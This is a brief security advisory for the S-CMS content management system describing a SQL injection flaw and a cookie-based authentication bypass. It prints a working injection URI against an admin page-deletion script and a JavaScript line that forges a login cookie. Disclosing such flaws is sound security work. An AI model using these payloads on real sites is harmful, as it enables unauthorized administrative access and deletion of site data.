S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities

S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/path/admin/delete_page.php?id=' or 1=1/*

The following data is available:

javascript:document.cookie = "login=OK; path=/"